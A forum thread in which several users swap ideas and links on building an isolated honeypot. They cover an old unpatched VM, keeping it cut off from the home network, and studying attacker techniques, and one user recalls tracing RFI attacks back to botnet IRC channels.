Jump to content

Recommended Posts

Posted

I can't off hand but I would suggest making sure you do a lot of research on this before doing it. Every extra thing you put on your network increases the attack surface and if you put on a honeypot and get it wrong you could end up deliberately putting a huge hole into your network.

Posted

Yeah, i've been waiting to see Hak5 do a segment on this and suggested it like 2 years ago. My main thing woul dbe to use a VM and then either XP pre SP1, or even an older apache server that is known to have flaws. you will want to deliberately leave some hole open, but don't make anything obvious that it is a honeypot.

One such progject, http://www.projecthoneypot.org/about_us.php offers software you can install to catch spammers. Thats just one example of what can be done.

Honeynet offers some papers on things pertaining to honeypots: http://www.honeynet.org/papers

Another article on how to set one up: http://www.oreillynet.com/pub/a/sysadmin/2006/09/28/honeypots.html I beleive is FreeBSD based, but coudl probably be done in lunix, just not with the exact same libraries for obvious reasons unix vs linux.

Posted

If you did an XP version what would you use it for? Would you want to try to collect tools from it, monitor and learn techniques, try to back trace the attackers?

On a recent Exotic Liability podcast they talked about deploying honeypots inside networks to detect attacks and malware trying to escape or probe other systems.

Posted

When deploying a honeypot, you want to ensure that it does not make any direct connection back into your network, or the attacker will use this weakness to exploit your network.

You want to ensure that the attacker stays inside that box, so securing the box will be very important.

There are a few websites that, sort of walk you through the whole process of deploying a honeypot, I would also recommend watching their videos, they should give you more ideas.

www.irongeek.com

www.pauldotcom.com

Posted (edited)

If you did an XP version what would you use it for? Would you want to try to collect tools from it, monitor and learn techniques, try to back trace the attackers?

On a recent Exotic Liability podcast they talked about deploying honeypots inside networks to detect attacks and malware trying to escape or probe other systems.

Purely for learning, in my case, what they did to get in, how they get in, what they changed, installed, etc. I've not actually done this yet, but I want to. I'd like a way to take a snapshot, and then compare changes made to the system, like what was done to the registry, back doors, etc. Even gather the programs they installed and where they report to.

My website used to get attacked pretty regularly, but luckily never was compromised. Not that it couldn't be done, but I've been lucky enough not to be vulnerable to the attacks in question. Most of the people try RFI attacks, and then move on when nothing gives up the ghost. I've been able to examine error logs and trace them back up the chain in a lot of cases, all the way to the IRC servers they use for their BOT nets, but I have no clue how to control the bot or access its commands, just sit in the channel and watch stuff come across the screen, as it reports sites it found, the links, vuln, etc.

I imagine BOT net owners probably already do something similar as a means to take over other botnets, and then use them for themselves, but that is not my intent. Purely academic and curiosity from my standpoint, but I can see where using this even as mentioned on Exotic Liability, in the enterprise network, to capture whats on your corporate lan would be useful. We had a few outbreaks where I used to work. The I Love You Virus, Melissa, and Blaster Worm were 3 I recall getting into the network, but only effecting a small portion of desktops and older windows servers from the lab. It was contained within the first few hours, but took weeks to comb through everything to make sure it hadn't been able to spread. Something I think a honeypot would have helped with had they implemented their own on the network to capture attacks on the lan.

Edited by digip
Posted

Purely for learning, in my case, what they did to get in, how they get in, what they changed, installed, etc. I've not actually done this yet, but I want to. I'd like a way to take a snapshot, and then compare changes made to the system, like what was done to the registry, back doors, etc. Even gather the programs they installed and where they report to.

Same here, I haven't actually deployed one yet, but it would certainly be a very useful tool to deploy and also to help us understand, the techniques and methods used to break into a system. And from that, to learn what they do once they have compromised a system.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...